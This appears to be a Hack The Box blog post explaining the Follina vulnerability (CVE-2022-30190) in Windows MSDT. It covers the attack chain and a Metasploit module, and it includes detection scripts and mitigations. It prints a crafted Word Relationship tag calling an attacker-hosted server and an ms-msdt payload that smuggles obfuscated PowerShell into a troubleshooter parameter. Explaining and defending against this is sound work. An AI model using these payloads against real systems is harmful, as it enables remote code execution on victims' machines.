CVE-2022-30190 (Follina) explained

Follina is a Microsoft Office vulnerability where the document uses the Word remote template feature to retrieve an HTML file from a remote web server, which in turn uses the ms-msdt MSProto

KyserClark, Oct 02, 2023

What is CVE-2022-30190? 

In late May 2022, the cybersecurity landscape buzzed with the discovery of CVE-2022-30190, also known as "Follina": a Remote Code Execution (RCE) vulnerability found within the Microsoft Windows Support Diagnostic Tool (MSDT).

This RCE vulnerability caught the attention of security professionals and system administrators alike, as it had already been exploited in the wild. Microsoft swiftly provided mitigation guidance on May 30, but full patches weren't released until June 14.

Follina's discovery and subsequent exploitation unveiled a critical gap in the security fabric of Windows systems. 

In this post, we’ll delve into the technical details of its operation, the potential risks it poses, and the steps taken to mitigate its effects.

Train to exploit and defend against Follina for free on HTB Labs⚔️:  Outdated is a Medium difficulty Linux machine that features a foothold based on the "Follina" CVE of 2022. 

Follina-based forensic challenge for blue teamers🛡️: Play the Follina-based forensic challenge on HTB Labs, Diagnostic.

You'll act as part of a SOC team that has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document (your docker). Your job is to figure out what's going on.

Train your team on CVE-2022-30190

HTB Enterprise releases new content every month that’s based on emerging threats and vulnerabilities. In response to this vulnerability, we released Follina in 2022, a machine that showcases CVE-2022-30190. This gives teams the chance to train on real-world, threat-landscape-connected scenarios in a safe and controlled environment. 

 

MSDT and CVE-2022-30190

CVE-2022-30190, also known as Follina, is a critical vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT). MSDT is a built-in feature found in various Windows operating systems. Like a mechanic for your computer, it detects problems and conducts routine examinations to ensure smooth performance.

Now, envision a scenario where someone can mislead this mechanic into accidentally unlocking the doors to critical areas of your computer system. These doors could lead to valuable information or even control over essential functions. This is, in essence, what happened with CVE-2022-30190.

A vulnerability was discovered in MSDT that could grant unauthorized individuals access to vital components of a Windows system. They could manipulate, retrieve, or even destroy critical information through remote code execution.

This alarming revelation highlights the importance of the diagnostic tool itself and the need for its rigorous security measures. By understanding how the tool functions, we can further grasp the nature of the vulnerability and the way attackers could exploit it.

Understanding this flaw sheds light on the diagnostic tool’s significant role in system functionality and how a seemingly innocuous feature can become a gateway to potential risks.


Vulnerability description

The core of CVE-2022-30190 lies in a flaw within Microsoft's Diagnostic Troubleshooting executable, msdt.exe, specifically in how MSDT processes malformed URIs, typically characterized by an unusual length and ending with '!'. 

This improper handling of such URIs is a flaw intrinsic to MSDT, and it is the crucial element that enables unauthorized command execution.

The most common delivery mechanism for Follina is through a Microsoft Word document. The malicious URI is too long to embed directly, so an HTML reference is downloaded automatically on open, and it uses JavaScript to invoke the malicious URI for MSDT.

This approach allows the attacker to bypass established security protocols like Office's Protected Mode and macro settings. 

Conditions for exploitation

Successful exploitation is contingent upon one of the following scenarios:

Preconditions

  • Attack vector: Local with User Interaction (CVSSv3: AV:L/AC:L/PR:N/UI:R)

  • Environment: Windows OS with Microsoft Office installed

  • User privilege: The exploit executes arbitrary code with the privileges of the user who opens the malicious Word document.

Satisfying Exploitability Checks

  • Document trustworthiness: The target must open a specially crafted Word document.

  • HTTP callback: A web server under the attacker's control must be accessible to serve the secondary payload.

  • Payload constraints: The secondary payload must surpass 4096 bytes to evade specific size checks.

  • User interaction: Although opening or executing the document is generally required, certain formats like .rtf can trigger the exploit simply by being previewed.

Application State

  • Office protected mode: Exploit remains effective even in Protected Mode.

  • Macro Settings: The exploit operates independently of macro settings.

Attack Chain Overview

  1. Initial vector: The attack commences with a Word document containing an external reference, specified via the Relationship tag in the word/_rels/document.xml.rels XML schema.

  2. Secondary vector: This external reference fetches a malicious HTML payload from a remote web server when the document is opened.

  3. Execution: The malicious HTML payload leverages the ms-msdt URI scheme to run arbitrary PowerShell commands.

Detailed exploitation steps

Stage 1: Document crafting

A malicious Relationship tag is embedded into the Word document's XML structure. Here's an example:

<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://10.0.0.28:8000/index.html!" TargetMode="External"/>

The Target attribute specifies the attacker-controlled HTTP server, hosting the secondary payload in an index.html file.
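For triage, the Stage 1 artifact can be pulled straight out of a suspect document. The following is an added example, not code from the original post or from any Microsoft tooling: it lists every external relationship in a DOCX and flags external oleObject targets fetched over HTTP(S). The function names and the benign hyperlink sample are assumptions; the flagged relationship is the one shown above.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
OFFICE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def external_relationships(docx_bytes):
    """Yield (part, Id, Type, Target) for each TargetMode="External" relationship."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            data = zf.read(part)
            if b"<!DOCTYPE" in data:  # OOXML parts need no DTD; skip instead of parsing
                continue
            for rel in ET.fromstring(data).iter(REL_TAG):
                if rel.get("TargetMode", "").lower() == "external":
                    yield part, rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")

def follina_indicators(docx_bytes):
    """Flag external oleObject relationships that point at an HTTP(S) URL."""
    hits = []
    for part, rid, rtype, target in external_relationships(docx_bytes):
        if rtype.endswith("/oleObject") and target.lower().startswith(("http://", "https://")):
            hits.append({"part": part, "id": rid, "target": target,
                         "trailing_bang": target.endswith("!")})
    return hits

def make_docx(relationships_xml):
    """Build a minimal in-memory archive holding only the .rels part (constructed sample)."""
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/'
            'relationships">' + relationships_xml + '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

# Constructed samples: a benign external hyperlink, and the Stage 1 relationship above.
HYPERLINK = ('<Relationship Id="rId5" Type="' + OFFICE + 'hyperlink" '
             'Target="https://example.com/" TargetMode="External"/>')
OLE = ('<Relationship Id="rId996" Type="' + OFFICE + 'oleObject" '
       'Target="http://10.0.0.28:8000/index.html!" TargetMode="External"/>')
SUSPICIOUS = make_docx(HYPERLINK + OLE)
BENIGN = make_docx(HYPERLINK)

if __name__ == "__main__":
    for hit in follina_indicators(SUSPICIOUS):
        print(hit)
```

External hyperlinks are common in legitimate documents, which is why the check keys on the oleObject relationship type rather than on TargetMode alone.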

Stage 2: Secondary payload retrieval

Upon opening the Word document, the HTML payload is fetched and executed. The payload exploits the ms-msdt URI scheme to set up the PowerShell execution. It must exceed 4096 bytes for successful execution.

Stage 3: PowerShell execution

A key part of the payload is as follows:

ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bm90ZXBhZA=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"

This segment exploits the IT_BrowseForFile parameter to inject arbitrary PowerShell commands, eventually executing mpsigstub.exe located in the system directory.

Stage 4: Evasion & detection

At the time of writing, only a few antivirus engines flag this activity, making it stealthy and difficult to detect. Windows real-time protection is among the few defenses capable of stopping it. However, given the low detection rate, other evasion tactics could potentially be deployed.
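Where file scanning misses the document, the msdt.exe launch itself is still visible in process-creation telemetry. The sketch below is an added example, not part of the original post: it scores msdt.exe launches using the markers visible in the Stage 3 payload (PCWDiagnostic, IT_BrowseForFile, a PowerShell sub-expression, path traversal). The event field names, the parent-process list and the sample events are assumptions constructed for illustration.

```python
import re

# Assumption: Office hosts treated as unusual parents for msdt.exe.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

MARKERS = {
    "pcwdiagnostic": re.compile(r"/id\s+PCWDiagnostic", re.I),
    "it_browseforfile": re.compile(r"IT_BrowseForFile\s*=", re.I),
    "ps_subexpression": re.compile(r"\$\("),
    "path_traversal": re.compile(r"(?:\.\.[\\/]){2,}"),
}

def basename(path):
    """Lower-cased file name from a Windows or POSIX style path."""
    return re.split(r"[\\/]", path)[-1].lower()

def triage(event):
    """Return (severity, matched markers) for an msdt.exe launch, None otherwise."""
    if basename(event["image"]) != "msdt.exe":
        return None
    matched = sorted(k for k, rx in MARKERS.items() if rx.search(event["command_line"]))
    office_parent = basename(event["parent_image"]) in OFFICE_PARENTS
    if {"it_browseforfile", "ps_subexpression"} <= set(matched):
        severity = "high"    # sub-expression injected into the troubleshooter parameter
    elif office_parent:
        severity = "medium"  # unusual parent, no injection markers in the command line
    else:
        severity = "info"
    return severity, matched

# Constructed process-creation events; PLACEHOLDER stands in for the injected command.
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
MSDT = r"C:\Windows\System32\msdt.exe"
EVENTS = [
    {"image": MSDT, "parent_image": WORD, "command_line":
        'msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? '
        'IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(PLACEHOLDER)i/../../../../'
        'Windows/System32/mpsigstub.exe"'},
    {"image": MSDT, "parent_image": WORD, "command_line": "msdt.exe /id PCWDiagnostic"},
    {"image": MSDT, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "msdt.exe /id PrinterDiagnostic"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": WORD,
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev), ev["command_line"][:60])
```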

Stage 5: Post-exploitation

The exploit culminates in the execution of mpsigstub.exe, operating with the local user's permissions. This could be a foundation for additional privilege escalation or lateral movement if coupled with other vulnerabilities.

The Follina vulnerability ingeniously exploits Microsoft Word's remote template feature, ms-msdt URI schemes, and msdt.exe's parameter handling. Its multi-stage nature and ability to bypass various security mechanisms make it a highly sophisticated and severe threat.

Metasploit module

There is a Metasploit module for Follina. The source code for it can be found on Packet Storm.

This Metasploit module crafts a Microsoft Word document that, once loaded, leverages the remote template feature. By fetching an HTML document, it utilizes the ms-msdt scheme to carry out PowerShell code execution.

Let's break down what this Metasploit module is doing:

  1. Creation of malicious components: The exploit generates three critical components: a malicious DOCX file, an HTML payload, and a JavaScript payload. The DOCX file is crafted using a default or user-specified MSF template.

  2. DOCX manipulation: Between lines 126-160, the exploit modifies the document.xml.rels file within the DOCX (which is essentially a ZIP archive). It inserts a malicious MSDT URI, preparing the document to fetch the HTML payload.

  3. HTML payload generation: The HTML payload is generated between lines 95-124 and is responsible for executing the embedded JavaScript. The JavaScript content, potentially obfuscated depending on user settings, is constructed to redirect the browser to the malicious URI using window.location.href, which triggers the PowerShell execution.

  4. Hosting and payload delivery: The Metasploit module hosts the HTML payload on a web server. When the target opens the manipulated DOCX file, Microsoft Word attempts to download the HTML payload due to the alterations made in the document.xml.rels file. This is orchestrated between lines 162-189, with specific response handling for .html and .ps1 requests, facilitating the delivery of both HTML and PowerShell payloads.

  5. PowerShell execution: The payload, once fetched, exploits the ms-msdt URI scheme to run arbitrary PowerShell commands, creating an execution gateway for the attackers.

  6. Finalizing and packing DOCX: Around lines 191-224, the modified DOCX file is finished and packed, containing the necessary alterations and injected payload, ready to be delivered to the target with the filename specified in the module's datastore options.

  7. Helper functions: Lastly, the module utilizes helper functions between lines 226-251 for URI normalization, random integer generation, and DOCX unpacking, assisting in the seamless execution of the exploit.

This modular approach, facilitated by the Metasploit Framework, exemplifies the ingenuity behind exploiting seemingly innocuous features in Microsoft Word. By leveraging remote templates, URI schemes, and PowerShell execution, it creates a sophisticated multi-layered attack mechanism.

By understanding the intricacies of this code, professionals can use it for legal penetration testing and to defend against such attacks.

Mitigation for CVE-2022-30190

Mitigating the Follina (CVE-2022-30190) vulnerability is paramount for securing your systems. Here's an easily digestible list of strategies to arm yourself against this threat:

1. Apply patch for CVE-2022-30190 to Windows systems:

  • The best line of defense is to apply the Microsoft-provided patch.

  • Note: test the patch in a development environment before deploying.

  • Affected Windows systems: Windows Server 2022/2019/2016/2012 & 2012 R2/2008 R2, Windows 11/10/8.1, Windows 7 Service Pack 1.

2. Explore applying a workaround provided by Microsoft:

  • If patching is delayed, Microsoft offers guidance for a workaround.

  • Note: as with the patch, test the workaround in a dev environment first.

  • Description: the vulnerability allows arbitrary code execution when MSDT is called using the URL protocol.

3. Utilize behavior detection and exploit prevention tools:

  • Solutions like Kaspersky protect against this vulnerability through specific detection verdicts like HEUR:Exploit.MSOffice.Agent.gen, PDM:Exploit.Win32.Generic, etc.

4. Disable support for the MSDT URL protocol:

  • Prevent exploitation by disabling MSDT URL protocol.

  • Back up the registry key with reg export HKEY_CLASSES_ROOT\ms-msdt filename.

  • Delete the registry key with reg delete HKEY_CLASSES_ROOT\ms-msdt /f.

Stay ahead of threats with Hack The Box

Hack The Box provides a wide range of scenarios to keep your team’s skills sharp and up-to-date. Organizations like Toyota, NVISO, and RS2 are already using the platform to stay ahead of threats with hands-on skills and a platform for acquiring, retaining, and developing top cyber talent. Talk to our team to learn more. 


Author bio: Kyser Clark (KyserClark), Cyber Defense Operations (1D771), United States Air Force (Active duty) 

Kyser is a Cyber Defense Operations leader with 5+ years of active duty U.S. Air Force experience specializing in offensive security, ethical hacking, penetration testing, and red teaming.

His credentials include a Bachelor of Science (BS) in Cybersecurity Management & Policy from the University of Maryland Global Campus (UMGC), and 11 industry certifications: OffSec Certified Professional (OSCP), (ISC)² Certified Information Systems Security Professional (CISSP), eLearnSecurity Junior Penetration Tester (eJPT), EC-Council Certified Ethical Hacker (CEH), Cisco Certified Network Associate (CCNA), CompTIA PenTest+, Cybersecurity Analyst (CySA+), Cloud+, Linux+, Security+, and Network+. 
